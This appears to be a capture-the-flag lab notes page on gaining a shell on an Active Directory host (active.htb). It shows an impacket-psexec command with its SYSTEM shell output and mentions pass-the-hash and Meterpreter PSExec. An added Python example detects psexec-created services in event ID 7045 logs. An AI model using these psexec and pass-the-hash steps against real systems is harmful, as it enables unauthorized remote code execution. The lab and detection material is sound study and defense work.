# AD Shell

### Getting Shell

Now that we have writable shares and credentials, we can also use psexec to get a shell.

{% embed url="<https://www.kali.org/tools/impacket-scripts/>" %}

```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service REEo on 10.10.10.100.....
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> 
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F7mp6vEz8KglgyQNN1hvE%2Fimage.png?alt=media&#x26;token=90d96dbe-e749-4afc-9570-1bd2b2ba5d8d" alt=""><figcaption></figcaption></figure>
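On the target, the session above leaves a recognisable trace: an executable with an 8-letter name written to `ADMIN$`, and a 4-letter service that is created and then started. The following added example (not part of the original page or of Impacket) scores "service installed" records, System log event ID 7045, against those traits. The record layout, the sample events and the function names are constructed for illustration.

```python
import re
from ntpath import basename, dirname

# Constructed sample of Service Control Manager "service installed" records
# (System log, event ID 7045), reduced to the fields used below. The second
# record reuses the service and file names from the psexec output above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Windows Update Medic",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k wusvcs",
     "StartType": "auto start", "Account": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "REEo",
     "ImagePath": r"%systemroot%\QDdDNPEh.exe",
     "StartType": "demand start", "Account": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Backup Agent",
     "ImagePath": r'"C:\Program Files\Backup\agent.exe" --svc',
     "StartType": "auto start", "Account": r"NT AUTHORITY\NetworkService"},
]

WINDOWS_ROOTS = {"%systemroot%", r"c:\windows"}   # where ADMIN$ points
RANDOM_EXE = re.compile(r"[A-Za-z]{8}\.exe")      # e.g. QDdDNPEh.exe
RANDOM_SVC = re.compile(r"[A-Za-z]{4}")           # e.g. REEo

def executable_of(image_path):
    """Return the executable part of an ImagePath, without quotes or arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        return path[1:].split('"', 1)[0]
    m = re.match(r"(.*?\.exe)\b", path, re.IGNORECASE)
    return m.group(1) if m else path

def score(event):
    """Count how many traits of the service created above an event shares."""
    if event.get("EventID") != 7045:
        return 0
    exe = executable_of(event["ImagePath"])
    return sum([
        dirname(exe).lower() in WINDOWS_ROOTS,            # binary sits in ADMIN$
        RANDOM_EXE.fullmatch(basename(exe)) is not None,  # 8-letter file name
        RANDOM_SVC.fullmatch(event["ServiceName"]) is not None,
        event["StartType"] == "demand start",
        event["Account"] == "LocalSystem",
    ])

def suspicious_services(events, threshold=4):
    """Names of installed services that match at least `threshold` traits."""
    return [e["ServiceName"] for e in events if score(e) >= threshold]

if __name__ == "__main__":
    print(suspicious_services(SAMPLE_EVENTS))
```

The threshold is below the full trait count so that a record still matches when one field differs, while a single coincidence such as a legitimate 4-letter service name does not trigger on its own.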

#### Pass the hash using Psexec

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FLI5eu6ZuBp9oG6tYhdjG%2Fimage.png?alt=media&#x26;token=274bf869-c8da-45c6-88be-6deb6fd1e80b" alt=""><figcaption></figcaption></figure>

### Meterpreter PSExec

We can also use Meterpreter PSExec to connect to the target. It can pass the hash as well.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FYQuV6yzzksNi2wA83JXM%2Fimage.png?alt=media&#x26;token=1b02555a-2f3c-40f0-9b52-e2abd7277d54" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FmR1Bh9u90ANh8w4o1Nez%2FScreenshot_17.png?alt=media&#x26;token=d1cf4099-44d1-40cf-8aa7-983d89b92312" alt=""><figcaption></figcaption></figure>
